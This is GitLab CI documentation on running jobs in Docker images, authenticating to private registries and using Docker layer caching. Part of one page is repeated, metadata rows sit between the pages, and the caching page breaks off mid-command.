`DOCKER_AUTH_CONFIG`: - Do a `docker login` on your local machine: ```shell docker login registry.example.com:5000 --username my_username --password my_password ``` Then copy the content of `~/.docker/config.json`. If you don't need access to the registry from your computer, you can do a `docker logout`: ```shell docker logout registry.example.com:5000 ``` - In some setups, it's possible the Docker client uses the available system key store to store the result of `docker login`. In that case, it's impossible to read `~/.docker/config.json`, so you must prepare the required base64-encoded version of `${username}:${password}` and create the Docker configuration JSON manually. Open a terminal and execute the following command: ```shell # The use of printf (as opposed to echo) prevents encoding a newline in the password. printf "my_username:my_password" | openssl base64 -A # Example output to copy bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ= ``` {{< alert type="note" >}} If your username includes special characters like `@`, you must escape them with a backslash (` \ `) to prevent authentication problems. {{< /alert >}} Create the Docker JSON configuration content as follows: ```json { "auths": { "registry.example.com:5000": { "auth": "(Base64 content from above)" } } } ``` #### Configure a job To configure a single job with access for `registry.example.com:5000`, follow these steps: 1. Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "auths": { "registry.example.com:5000": { "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=" } } } ``` 1. You can now use any private image from `registry.example.com:5000` defined in `image` or `services` in your `.gitlab-ci.yml` file: ```yaml image: registry.example.com:5000/namespace/image:tag ``` In the previous example, GitLab Runner looks at `registry.example.com:5000` for the image `namespace/image:tag`. You can add configuration for as many registries as you want, adding more registries to the `"auths"` hash as described previously. The full `hostname:port` combination is required everywhere for the runner to match the `DOCKER_AUTH_CONFIG`. For example, if `registry.example.com:5000/namespace/image:tag` is specified in the `.gitlab-ci.yml` file, then the `DOCKER_AUTH_CONFIG` must also specify `registry.example.com:5000`. Specifying only `registry.example.com` does not work. ### Configuring a runner If you have many pipelines that access the same registry, you should set up registry access at the runner level. This allows pipeline authors to have access to a private registry just by running a job on the appropriate runner. It also helps simplify registry changes and credential rotations. This means that any job on that runner can access the registry with the same privilege, even across projects. If you need to control access to the registry, you need to be sure to control access to the runner. To add `DOCKER_AUTH_CONFIG` to a runner: 1. Modify the runner's `config.toml` file as follows: ```toml [[runners]] environment = ["DOCKER_AUTH_CONFIG={\"auths\":{\"registry.example.com:5000\":{\"auth\":\"bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=\"}}}"] ``` - The double quotes included in the `DOCKER_AUTH_CONFIG` data must be escaped with backslashes. This prevents them from being interpreted as TOML. - The `environment` option is a list. Your runner may have existing entries and you should add this to the list, not replace it. 1. Restart the runner service. ### Use a Credentials Store To configure a Credentials Store: 1. To use a Credentials Store, you need an external helper program to interact with a specific keychain or external store. Make sure the helper program is available in the GitLab Runner `$PATH`. 1. Make GitLab Runner use it. You can accomplish this by using one of the following options: - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "credsStore": "osxkeychain" } ``` - Or, if you're running self-managed runners, add the JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository. `credsStore` is used to access **all** the registries. If you use both images from a private registry and public images from Docker Hub, pulling from Docker Hub fails. Docker daemon tries to use the same credentials for **all** the registries. ### Use Credential Helpers As an example, let's assume that you want to use the `<aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest` image. This image is private and requires you to sign in to a private container registry. To configure access for `<aws_account_id>.dkr.ecr.<region>.amazonaws.com`, follow these steps: 1. Make sure [`docker-credential-ecr-login`](https://github.com/awslabs/amazon-ecr-credential-helper) is available in the GitLab Runner `$PATH`. 1. Have any of the following [AWS credentials setup](https://github.com/awslabs/amazon-ecr-credential-helper#aws-credentials). Make sure that GitLab Runner can access the credentials. 1. Make GitLab Runner use it. You can accomplish this by using one of the following options: - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "credHelpers": { "<aws_account_id>.dkr.ecr.<region>.amazonaws.com": "ecr-login" } } ``` This configures Docker to use the Credential Helper for a specific registry. Instead, you can configure Docker to use the Credential Helper for all Amazon Elastic Container Registry (ECR) registries: ```json { "credsStore": "ecr-login" } ``` {{< alert type="note" >}} If you use `{"credsStore": "ecr-login"}`, set the region explicitly in the AWS shared configuration file (`~/.aws/config`). The region must be specified when the ECR Credential Helper retrieves the authorization token. {{< /alert >}} - Or, if you're running self-managed runners, add the previous JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository. 1. You can now use any private image from `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` defined in `image` and/or `services` in your `.gitlab-ci.yml` file: ```yaml image: <aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest ``` In the example, GitLab Runner looks at `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` for the image `private/image:latest`. You can add configuration for as many registries as you want, adding more registries to the `"credHelpers"` hash. ### Use checksum to keep your image secure Use the image checksum in your job definition in your `.gitlab-ci.yml` file to verify the integrity of the image. A failed image integrity verification prevents you from using a modified container. To use the image checksum you have to append the checksum at the end: ```yaml image: ruby:2.6.8@sha256:d1dbaf9665fe8b2175198e49438092fdbcf4d8934200942b94425301b17853c7 ``` To get the image checksum, on the image `TAG` tab, view the `DIGEST` column. For example, view the [Ruby image](https://hub.docker.com/_/ruby?tab=tags). The checksum is a random string, like `6155f0235e95`. You can also get the checksum of any image on your system with the command `docker images --digests`: ```shell ❯ docker images --digests REPOSITORY TAG DIGEST (...) gitlab/gitlab-ee latest sha256:723aa6edd8f122d50cae490b1743a616d54d4a910db892314d68470cc39dfb24 (...) gitlab/gitlab-runner latest sha256:4a18a80f5be5df44cb7575f6b89d1fdda343297c6fd666c015c0e778b276e726 (...) ``` ## Creating a Custom GitLab Runner Docker Image You can create a custom GitLab Runner Docker image to package AWS CLI and Amazon ECR Credential Helper. This setup facilitates secure and streamlined interactions with AWS services, especially for containerized applications. For example, use this setup to manage, deploy, and update Docker images on Amazon ECR. This setup helps avoid time consuming, error-prone configurations, and manual credential management. 1. [Authenticate GitLab with AWS](../cloud_deployment/_index.md#authenticate-gitlab-with-aws). 1. Create a `Dockerfile` with the following content: ```Dockerfile # Control package versions ARG GITLAB_RUNNER_VERSION=v17.3.0 ARG AWS_CLI_VERSION=2.17.36 # AWS CLI and Amazon ECR Credential Helper FROM amazonlinux as aws-tools RUN set -e \ && yum update -y \ && yum install -y --allowerasing git make gcc curl unzip \ && curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" --output "awscliv2.zip" \ && unzip awscliv2.zip && ./aws/install -i /usr/local/bin \ && yum clean all # Download and install ECR Credential Helper RUN curl --location --output /usr/local/bin/docker-credential-ecr-login "https://github.com/awslabs/amazon-ecr-credential-helper/releases/latest/download/docker-credential-ecr-login-linux-amd64" RUN chmod +x /usr/local/bin/docker-credential-ecr-login # Configure the ECR Credential Helper RUN mkdir -p /root/.docker RUN echo '{ "credsStore": "ecr-login" }' > /root/.docker/config.json # Final image based on GitLab Runner FROM gitlab/gitlab-runner:${GITLAB_RUNNER_VERSION} # Install necessary packages RUN apt-get update \ && apt-get install -y --no-install-recommends jq procps curl unzip groff libgcrypt20 tar gzip less openssh-client \ && apt-get clean && rm -rf /var/lib/apt/lists/* # Copy AWS CLI and Amazon ECR Credential Helper binaries COPY --from=aws-tools /usr/local/bin/ /usr/local/bin/ # Copy ECR Credential Helper Configuration COPY --from=aws-tools /root/.docker/config.json /root/.docker/config.json ``` 1. To build the custom GitLab Runner Docker image in a `.gitlab-ci.yml`, include the following example: ```yaml variables: DOCKER_DRIVER: overlay2 IMAGE_NAME: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_NAME GITLAB_RUNNER_VERSION: v17.3.0 AWS_CLI_VERSION: 2.17.36 stages: - build build-image: stage: build script: - echo "Logging into GitLab container registry..." - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - echo "Building Docker image..." - docker build --build-arg GITLAB_RUNNER_VERSION=${GITLAB_RUNNER_VERSION} --build-arg AWS_CLI_VERSION=${AWS_CLI_VERSION} -t ${IMAGE_NAME} . - echo "Pushing Docker image to GitLab container registry..." - docker push ${IMAGE_NAME} rules: - changes: - Dockerfile ``` 1. [Register the runner](https://docs.gitlab.com/runner/register/#docker).
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments description: Learn how to run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine. title: Run your CI/CD jobs in Docker containers breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can run your CI/CD jobs in Docker containers hosted on dedicated CI/CD build servers or your local machine. To run CI/CD jobs in a Docker container, you need to: 1. Register a runner and configure it to use the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html). 1. Specify the container image where you want to run the CI/CD jobs in the `.gitlab-ci.yml` file. 1. Optional. Run other services, like MySQL, in containers. Do this by specifying [services](../services/_index.md) in your `.gitlab-ci.yml` file. ## Register a runner that uses the Docker executor To use GitLab Runner with Docker you need to [register a runner](https://docs.gitlab.com/runner/register/) that uses the Docker executor. This example shows how to set up a temporary template to supply services: ```shell cat > /tmp/test-config.template.toml << EOF [[runners]] [runners.docker] [[runners.docker.services]] name = "postgres:latest" [[runners.docker.services]] name = "mysql:latest" EOF ``` Then use this template to register the runner: ```shell sudo gitlab-runner register \ --url "https://gitlab.example.com/" \ --token "$RUNNER_TOKEN" \ --description "docker-ruby:2.6" \ --executor "docker" \ --template-config /tmp/test-config.template.toml \ --docker-image ruby:3.3 ``` The registered runner uses the `ruby:2.6` Docker image and runs two services, `postgres:latest` and `mysql:latest`, both of which are accessible during the build process. ## What is an image The `image` keyword is the name of the Docker image the Docker executor uses to run CI/CD jobs. By default, the executor pulls images from [Docker Hub](https://hub.docker.com/). However, you can configure the registry location in the `gitlab-runner/config.toml` file. For example, you can set the [Docker pull policy](https://docs.gitlab.com/runner/executors/docker.html#how-pull-policies-work) to use local images. For more information about images and Docker Hub, see the [Docker overview](https://docs.docker.com/get-started/overview/). ## Image requirements Any image used to run a CI/CD job must have the following applications installed: - `sh` or `bash` - `grep` ## Define `image` in the `.gitlab-ci.yml` file You can define an image that's used for all jobs, and a list of services that you want to use during runtime: ```yaml default: image: ruby:2.6 services: - postgres:11.7 before_script: - bundle install test: script: - bundle exec rake spec ``` The image name must be in one of the following formats: - `image: <image-name>` (Same as using `<image-name>` with the `latest` tag) - `image: <image-name>:<tag>` - `image: <image-name>@<digest>` ## Extended Docker configuration options {{< history >}} - Introduced in GitLab and GitLab Runner 9.4. {{< /history >}} You can use a string or a map for the `image` or `services` entries: - Strings must include the full image name (including the registry, if you want to download the image from a registry other than Docker Hub). - Maps must contain at least the `name` option, which is the same image name as used for the string setting. For example, the following two definitions are equal: - A string for `image` and `services`: ```yaml image: "registry.example.com/my/image:latest" services: - postgresql:14.3 - redis:latest ``` - A map for `image` and `services`. The `image:name` is required: ```yaml image: name: "registry.example.com/my/image:latest" services: - name: postgresql:14.3 - name: redis:latest ``` ## Where scripts are executed When a CI job runs in a Docker container, the `before_script`, `script`, and `after_script` commands run in the `/builds/<project-path>/` directory. Your image may have a different default `WORKDIR` defined. To move to your `WORKDIR`, save the `WORKDIR` as an environment variable so you can reference it in the container during the job's runtime. ### Override the entrypoint of an image {{< history >}} - Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](using_docker_images.md#extended-docker-configuration-options). {{< /history >}} Before explaining the available entrypoint override methods, let's describe how the runner starts. It uses a Docker image for the containers used in the CI/CD jobs: 1. The runner starts a Docker container using the defined entrypoint. The default from `Dockerfile` that may be overridden in the `.gitlab-ci.yml` file. 1. The runner attaches itself to a running container. 1. The runner prepares a script (the combination of [`before_script`](../yaml/_index.md#before_script), [`script`](../yaml/_index.md#script), and [`after_script`](../yaml/_index.md#after_script)). 1. The runner sends the script to the container's shell `stdin` and receives the output. To override the [entrypoint](https://docs.gitlab.com/runner/executors/docker.html#configure-a-docker-entrypoint) of a Docker image, in the `.gitlab-ci.yml` file: - For Docker 17.06 and later, set `entrypoint` to an empty value. - For Docker 17.03 and earlier, set `entrypoint` to `/bin/sh -c`, `/bin/bash -c`, or an equivalent shell available in the image. The syntax of `image:entrypoint` is similar to [Dockerfile `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint). Let's assume you have a `super/sql:experimental` image with a SQL database in it. You want to use it as a base image for your job because you want to execute some tests with this database binary. Let's also assume that this image is configured with `/usr/bin/super-sql run` as an entrypoint. When the container starts without additional options, it runs the database's process. The runner expects that the image has no entrypoint or that the entrypoint is prepared to start a shell command. With the extended Docker configuration options, instead of: - Creating your own image based on `super/sql:experimental`. - Setting the `ENTRYPOINT` to a shell. - Using the new image in your CI job. You can now define an `entrypoint` in the `.gitlab-ci.yml` file. **For Docker 17.06 and later**: ```yaml image: name: super/sql:experimental entrypoint: [""] ``` **For Docker 17.03 and earlier**: ```yaml image: name: super/sql:experimental entrypoint: ["/bin/sh", "-c"] ``` ## Define image and services in `config.toml` In the `config.toml` file, you can define: - In the [`[runners.docker]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdocker-section) section, the container image used to run CI/CD jobs - In the [`[[runners.docker.services]]`](https://docs.gitlab.com/runner/configuration/advanced-configuration#the-runnersdockerservices-section) section, the [services](../services/_index.md) container ```toml [runners.docker] image = "ruby:latest" services = ["mysql:latest", "postgres:latest"] ``` The image and services defined this way are added to all jobs run by that runner. ## Access an image from a private container registry To access private container registries, the GitLab Runner process can use: - [Statically defined credentials](#use-statically-defined-credentials). A username and password for a specific registry. - [Credentials Store](#use-a-credentials-store). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-stores). - [Credential Helpers](#use-credential-helpers). For more information, see [the relevant Docker documentation](https://docs.docker.com/reference/cli/docker/login/#credential-helpers). When you use the [GitLab Container Registry](../../user/packages/container_registry/_index.md) on the same GitLab instance, GitLab provides default credentials for this registry. With these credentials, the `CI_JOB_TOKEN` is used for authentication. To use the job token, the user starting the job must have at least the Developer role for the project where the private image is hosted. The project hosting the private image must also allow the other project to authenticate with the job token. This access is disabled by default. For more details, see [CI/CD job token](../jobs/ci_job_token.md#control-job-token-access-to-your-project). To define which option should be used, the runner process reads the configuration in this order: - A `DOCKER_AUTH_CONFIG` [CI/CD variable](../variables/_index.md). - A `DOCKER_AUTH_CONFIG` environment variable set in the runner's `config.toml` file. - A `config.json` file in `$HOME/.docker` directory of the user running the process. If the `--user` flag is provided to run the child processes as unprivileged user, the home directory of the main runner process user is used. ### Requirements and limitations - [Credentials Store](#use-a-credentials-store) and [Credential Helpers](#use-credential-helpers) require binaries to be added to the GitLab Runner `$PATH`, and require access to do so. Therefore, these features are not available on instance runners, or any other runner where the user does not have access to the environment where the runner is installed. ### Use statically-defined credentials You can access a private registry using two approaches. Both require setting the CI/CD variable `DOCKER_AUTH_CONFIG` with appropriate authentication information. 1. Per-job: To configure one job to access a private registry, add `DOCKER_AUTH_CONFIG` as a [CI/CD variable](../variables/_index.md). 1. Per-runner: To configure a runner so all its jobs can access a private registry, add `DOCKER_AUTH_CONFIG` as an environment variable in the runner's configuration. See the following sections for examples of each. #### Determine your `DOCKER_AUTH_CONFIG` data As an example, let's assume you want to use the `registry.example.com:5000/private/image:latest` image. This image is private and requires you to sign in to a private container registry. Let's also assume that these are the sign-in credentials: | Key | Value | |:---------|:------| | registry | `registry.example.com:5000` | | username | `my_username` | | password | `my_password` | Use one of the following methods to determine the value for `DOCKER_AUTH_CONFIG`: - Do a `docker login` on your local machine: ```shell docker login registry.example.com:5000 --username my_username --password my_password ``` Then copy the content of `~/.docker/config.json`. If you don't need access to the registry from your computer, you can do a `docker logout`: ```shell docker logout registry.example.com:5000 ``` - In some setups, it's possible the Docker client uses the available system key store to store the result of `docker login`. In that case, it's impossible to read `~/.docker/config.json`, so you must prepare the required base64-encoded version of `${username}:${password}` and create the Docker configuration JSON manually. Open a terminal and execute the following command: ```shell # The use of printf (as opposed to echo) prevents encoding a newline in the password. printf "my_username:my_password" | openssl base64 -A # Example output to copy bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ= ``` {{< alert type="note" >}} If your username includes special characters like `@`, you must escape them with a backslash (` \ `) to prevent authentication problems. {{< /alert >}} Create the Docker JSON configuration content as follows: ```json { "auths": { "registry.example.com:5000": { "auth": "(Base64 content from above)" } } } ``` #### Configure a job To configure a single job with access for `registry.example.com:5000`, follow these steps: 1. Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "auths": { "registry.example.com:5000": { "auth": "bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=" } } } ``` 1. You can now use any private image from `registry.example.com:5000` defined in `image` or `services` in your `.gitlab-ci.yml` file: ```yaml image: registry.example.com:5000/namespace/image:tag ``` In the previous example, GitLab Runner looks at `registry.example.com:5000` for the image `namespace/image:tag`. You can add configuration for as many registries as you want, adding more registries to the `"auths"` hash as described previously. The full `hostname:port` combination is required everywhere for the runner to match the `DOCKER_AUTH_CONFIG`. For example, if `registry.example.com:5000/namespace/image:tag` is specified in the `.gitlab-ci.yml` file, then the `DOCKER_AUTH_CONFIG` must also specify `registry.example.com:5000`. Specifying only `registry.example.com` does not work. ### Configuring a runner If you have many pipelines that access the same registry, you should set up registry access at the runner level. This allows pipeline authors to have access to a private registry just by running a job on the appropriate runner. It also helps simplify registry changes and credential rotations. This means that any job on that runner can access the registry with the same privilege, even across projects. If you need to control access to the registry, you need to be sure to control access to the runner. To add `DOCKER_AUTH_CONFIG` to a runner: 1. Modify the runner's `config.toml` file as follows: ```toml [[runners]] environment = ["DOCKER_AUTH_CONFIG={\"auths\":{\"registry.example.com:5000\":{\"auth\":\"bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=\"}}}"] ``` - The double quotes included in the `DOCKER_AUTH_CONFIG` data must be escaped with backslashes. This prevents them from being interpreted as TOML. - The `environment` option is a list. Your runner may have existing entries and you should add this to the list, not replace it. 1. Restart the runner service. ### Use a Credentials Store To configure a Credentials Store: 1. To use a Credentials Store, you need an external helper program to interact with a specific keychain or external store. Make sure the helper program is available in the GitLab Runner `$PATH`. 1. Make GitLab Runner use it. You can accomplish this by using one of the following options: - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "credsStore": "osxkeychain" } ``` - Or, if you're running self-managed runners, add the JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository. `credsStore` is used to access **all** the registries. If you use both images from a private registry and public images from Docker Hub, pulling from Docker Hub fails. Docker daemon tries to use the same credentials for **all** the registries. ### Use Credential Helpers As an example, let's assume that you want to use the `<aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest` image. This image is private and requires you to sign in to a private container registry. To configure access for `<aws_account_id>.dkr.ecr.<region>.amazonaws.com`, follow these steps: 1. Make sure [`docker-credential-ecr-login`](https://github.com/awslabs/amazon-ecr-credential-helper) is available in the GitLab Runner `$PATH`. 1. Have any of the following [AWS credentials setup](https://github.com/awslabs/amazon-ecr-credential-helper#aws-credentials). Make sure that GitLab Runner can access the credentials. 1. Make GitLab Runner use it. You can accomplish this by using one of the following options: - Create a [CI/CD variable](../variables/_index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json { "credHelpers": { "<aws_account_id>.dkr.ecr.<region>.amazonaws.com": "ecr-login" } } ``` This configures Docker to use the Credential Helper for a specific registry. Instead, you can configure Docker to use the Credential Helper for all Amazon Elastic Container Registry (ECR) registries: ```json { "credsStore": "ecr-login" } ``` {{< alert type="note" >}} If you use `{"credsStore": "ecr-login"}`, set the region explicitly in the AWS shared configuration file (`~/.aws/config`). The region must be specified when the ECR Credential Helper retrieves the authorization token. {{< /alert >}} - Or, if you're running self-managed runners, add the previous JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository. 1. You can now use any private image from `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` defined in `image` and/or `services` in your `.gitlab-ci.yml` file: ```yaml image: <aws_account_id>.dkr.ecr.<region>.amazonaws.com/private/image:latest ``` In the example, GitLab Runner looks at `<aws_account_id>.dkr.ecr.<region>.amazonaws.com` for the image `private/image:latest`. You can add configuration for as many registries as you want, adding more registries to the `"credHelpers"` hash. ### Use checksum to keep your image secure Use the image checksum in your job definition in your `.gitlab-ci.yml` file to verify the integrity of the image. A failed image integrity verification prevents you from using a modified container. To use the image checksum you have to append the checksum at the end: ```yaml image: ruby:2.6.8@sha256:d1dbaf9665fe8b2175198e49438092fdbcf4d8934200942b94425301b17853c7 ``` To get the image checksum, on the image `TAG` tab, view the `DIGEST` column. For example, view the [Ruby image](https://hub.docker.com/_/ruby?tab=tags). The checksum is a random string, like `6155f0235e95`. You can also get the checksum of any image on your system with the command `docker images --digests`: ```shell ❯ docker images --digests REPOSITORY TAG DIGEST (...) gitlab/gitlab-ee latest sha256:723aa6edd8f122d50cae490b1743a616d54d4a910db892314d68470cc39dfb24 (...) gitlab/gitlab-runner latest sha256:4a18a80f5be5df44cb7575f6b89d1fdda343297c6fd666c015c0e778b276e726 (...) ``` ## Creating a Custom GitLab Runner Docker Image You can create a custom GitLab Runner Docker image to package AWS CLI and Amazon ECR Credential Helper. This setup facilitates secure and streamlined interactions with AWS services, especially for containerized applications. For example, use this setup to manage, deploy, and update Docker images on Amazon ECR. This setup helps avoid time consuming, error-prone configurations, and manual credential management. 1. [Authenticate GitLab with AWS](../cloud_deployment/_index.md#authenticate-gitlab-with-aws). 1. Create a `Dockerfile` with the following content: ```Dockerfile # Control package versions ARG GITLAB_RUNNER_VERSION=v17.3.0 ARG AWS_CLI_VERSION=2.17.36 # AWS CLI and Amazon ECR Credential Helper FROM amazonlinux as aws-tools RUN set -e \ && yum update -y \ && yum install -y --allowerasing git make gcc curl unzip \ && curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" --output "awscliv2.zip" \ && unzip awscliv2.zip && ./aws/install -i /usr/local/bin \ && yum clean all # Download and install ECR Credential Helper RUN curl --location --output /usr/local/bin/docker-credential-ecr-login "https://github.com/awslabs/amazon-ecr-credential-helper/releases/latest/download/docker-credential-ecr-login-linux-amd64" RUN chmod +x /usr/local/bin/docker-credential-ecr-login # Configure the ECR Credential Helper RUN mkdir -p /root/.docker RUN echo '{ "credsStore": "ecr-login" }' > /root/.docker/config.json # Final image based on GitLab Runner FROM gitlab/gitlab-runner:${GITLAB_RUNNER_VERSION} # Install necessary packages RUN apt-get update \ && apt-get install -y --no-install-recommends jq procps curl unzip groff libgcrypt20 tar gzip less openssh-client \ && apt-get clean && rm -rf /var/lib/apt/lists/* # Copy AWS CLI and Amazon ECR Credential Helper binaries COPY --from=aws-tools /usr/local/bin/ /usr/local/bin/ # Copy ECR Credential Helper Configuration COPY --from=aws-tools /root/.docker/config.json /root/.docker/config.json ``` 1. To build the custom GitLab Runner Docker image in a `.gitlab-ci.yml`, include the following example: ```yaml variables: DOCKER_DRIVER: overlay2 IMAGE_NAME: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_NAME GITLAB_RUNNER_VERSION: v17.3.0 AWS_CLI_VERSION: 2.17.36 stages: - build build-image: stage: build script: - echo "Logging into GitLab container registry..." - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - echo "Building Docker image..." - docker build --build-arg GITLAB_RUNNER_VERSION=${GITLAB_RUNNER_VERSION} --build-arg AWS_CLI_VERSION=${AWS_CLI_VERSION} -t ${IMAGE_NAME} . - echo "Pushing Docker image to GitLab container registry..." - docker push ${IMAGE_NAME} rules: - changes: - Dockerfile ``` 1. [Register the runner](https://docs.gitlab.com/runner/register/#docker).
https://docs.gitlab.com/ci/docker_layer_caching
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/docker_layer_caching.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
docker_layer_caching.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Make Docker-in-Docker builds faster with Docker layer caching
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When using Docker-in-Docker, Docker downloads all layers of your image every time you create a build. Recent versions of Docker (Docker 1.13 and later) can use a pre-existing image as a cache during the `docker build` step. This significantly accelerates the build process. In Docker 27.0.1 and later, the default `docker` build driver only supports cache backends when the `containerd` image store is enabled. To use Docker caching with Docker 27.0.1 and later, do one of the following: - Enable the `containerd` image store in your Docker daemon configuration. - Select a different build driver. For more information, see [Cache storage backends](https://docs.docker.com/build/cache/backends/). ## How Docker caching works When running `docker build`, each command in `Dockerfile` creates a layer. These layers are retained as a cache and can be reused if there have been no changes. Change in one layer causes the recreation of all subsequent layers. To specify a tagged image to be used as a cache source for the `docker build` command, use the `--cache-from` argument. Multiple images can be specified as a cache source by using multiple `--cache-from` arguments. ## Docker inline caching example This example `.gitlab-ci.yml` file shows how to use Docker caching with the `inline` cache backend with the default `docker build` command. ```yaml default: image: docker:27.4.1 services: - docker:27.4.1-dind before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY variables: # Use TLS https://docs.gitlab.com/ee/ci/docker/using_docker_build.html#tls-enabled DOCKER_HOST: tcp://docker:2376 DOCKER_TLS_CERTDIR: "/certs" build: stage: build script: - docker pull $CI_REGISTRY_IMAGE:latest || true - docker build --build-arg BUILDKIT_INLINE_CACHE=1 --cache-from $CI_REGISTRY_IMAGE:latest --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --tag $CI_REGISTRY_IMAGE:latest . - docker push $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA - docker push $CI_REGISTRY_IMAGE:latest ``` In the `script` section for the `build` job: 1. The first command tries to pull the image from the registry so that it can be used as a cache for the `docker build` command. Any image that's used with the `--cache-from` argument must be pulled (using `docker pull`) before it can be used as a cache source. 1. The second command builds a Docker image by using the pulled image as a cache (see the `--cache-from $CI_REGISTRY_IMAGE:latest` argument) if available, and tags it. The `--build-arg BUILDKIT_INLINE_CACHE=1` tells Docker to use [inline caching](https://docs.docker.com/build/cache/backends/inline/), which embeds the build cache into the image itself. 1. The last two commands push the tagged Docker images to the container registry so that they can also be used as cache for subsequent builds. ## Docker registry caching example You can cache your Docker builds directly to a dedicated cache image in the registry. This example `.gitlab-ci.yml` file shows how to use Docker caching with the `docker buildx build` command and the `registry` cache backend. For more advanced caching options, see [Cache storage backends](https://docs.docker.com/build/cache/backends/). ```yaml default: image: docker:27.4.1 services: - docker:27.4.1-dind before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY variables: # Use TLS https://docs.gitlab.com/ee/ci/docker/using_docker_build.html#tls-enabled DOCKER_HOST: tcp://docker:2376 DOCKER_TLS_CERTDIR: "/certs" build: stage: build script: - docker context create my-builder - docker buildx create my-builder --driver docker-container --use - docker buildx build --push -t $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --cache-to type=registry,ref=$CI_REGISTRY_IMAGE/cache-image,mode=max --cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image . ``` The `build` job's `script`: 1. Creates and configures the `docker-container` BuildKit driver, which supports the `registry` cache backend. 1. Builds and pushes a Docker image using: - A dedicated cache image with `--cache-from type=registry,ref=$CI_REGISTRY_IMAGE/cache-image`. - Cache updates with `--cache-to type=registry,ref=$CI_REGISTRY_IMAGE/cache-image,mode=max`, where `max` mode caches intermediate layers.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Make Docker-in-Docker builds faster with Docker layer caching breadcrumbs: - doc - ci - docker --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When using Docker-in-Docker, Docker downloads all layers of your image every time you create a build. Recent versions of Docker (Docker 1.13 and later) can use a pre-existing image as a cache during the `docker build` step. This significantly accelerates the build process. In Docker 27.0.1 and later, the default `docker` build driver only supports cache backends when the `containerd` image store is enabled. To use Docker caching with Docker 27.0.1 and later, do one of the following: - Enable the `containerd` image store in your Docker daemon configuration. - Select a different build driver. For more information, see [Cache storage backends](https://docs.docker.com/build/cache/backends/). ## How Docker caching works When running `docker build`, each command in `Dockerfile` creates a layer. These layers are retained as a cache and can be reused if there have been no changes. Change in one layer causes the recreation of all subsequent layers. To specify a tagged image to be used as a cache source for the `docker build` command, use the `--cache-from` argument. Multiple images can be specified as a cache source by using multiple `--cache-from` arguments. ## Docker inline caching example This example `.gitlab-ci.yml` file shows how to use Docker caching with the `inline` cache backend with the default `docker build` command. ```yaml default: image: docker:27.4.1 services: - docker:27.4.1-dind before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY variables: # Use TLS https://docs.gitlab.com/ee/ci/docker/using_docker_build.html#tls-enabled DOCKER_HOST: tcp://docker:2376 DOCKER_TLS_CERTDIR: "/certs" build: stage: build script: - docker pull $CI_REGISTRY_IMAGE:latest || true - docker build --build-arg BUILDKIT_INLINE_CACHE=1 --cache-from 